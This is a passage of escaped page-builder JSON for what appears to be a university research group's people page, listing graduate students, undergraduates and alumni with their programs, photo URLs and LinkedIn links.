Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Ph.D. Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c104\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c105\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c104\",\"index\":2,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c104\",\"index\":3,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c104\",\"index\":1,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-sara-edwards1-e1697206932891.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1754,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c68\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c67\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c140\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c140\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c145\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c145\",\"index\":2,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c145\",\"index\":1,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c150\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c150\",\"index\":2,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM       https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c150\",\"index\":1,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c144\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c143\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c155\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c155\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c160\",\"index\":2,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c160\",\"index\":1,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c165\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c165\",\"index\":2,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c165\",\"index\":1,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c175\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c175\",\"index\":2,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c175\",\"index\":1,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c180\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c180\",\"index\":2,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c180\",\"index\":1,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c185\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c185\",\"index\":2,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c185\",\"index\":1,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c190\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c190\",\"index\":2,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 